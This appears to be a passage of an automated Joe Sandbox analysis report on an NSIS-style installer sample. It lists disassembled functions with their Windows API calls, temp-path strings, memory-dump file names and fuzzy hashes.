                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$6B
                                                • API String ID: 3540041739-3884863406
                                                • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp$C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll
                                                • API String ID: 3109718747-2415403462
                                                • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                Function 73CB18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: fe4f6640bc320f0af7de7cfe8cf2361b973a57ca8f7d4eb43d02926f5058a799
                                                • Instruction ID: e4b0e128cd677cac2f64ce6f4740e78d7644780a5d810eefccc688e2417b1f2f
                                                • Opcode Fuzzy Hash: fe4f6640bc320f0af7de7cfe8cf2361b973a57ca8f7d4eb43d02926f5058a799
                                                • Instruction Fuzzy Hash: 5E51E632D00199DBDB029FE588807AEBBBBEF85350B164269D402EB184D77DBF818791
                                                Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401DBC
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                Function 73CB1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73CB21F0,?,00000808), ref: 73CB1639
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73CB21F0,?,00000808), ref: 73CB1640
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73CB21F0,?,00000808), ref: 73CB1654
                                                • GetProcAddress.KERNEL32(73CB21F0,00000000), ref: 73CB165B
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB1664
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 6ccca23c0d8e8aff153ccdcc6a8bdbd3c44f71cc2fbcb375186e18169e5d10a7
                                                • Instruction ID: cb0f8954f270009e72719e491f052743a5fa563b2b690cdf50c235b1e7387733
                                                • Opcode Fuzzy Hash: 6ccca23c0d8e8aff153ccdcc6a8bdbd3c44f71cc2fbcb375186e18169e5d10a7
                                                • Instruction Fuzzy Hash: 64F01C732461787BD62066A79C4CD9BBE9CDF8B2F5B210211F66C9219096629C01DBF1
                                                Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                • Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403346,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403346,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 2659869361-2382934351
                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Close$Enum
                                                • String ID:
                                                • API String ID: 464197530-0
                                                • Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                • Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040528F
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                  • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll), ref: 004061A3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                • CloseHandle.KERNEL32(?), ref: 004058A3
                                                Strings
                                                • Error launching installer, xrefs: 00405880
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                • GlobalFree.KERNEL32(?), ref: 00403900
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
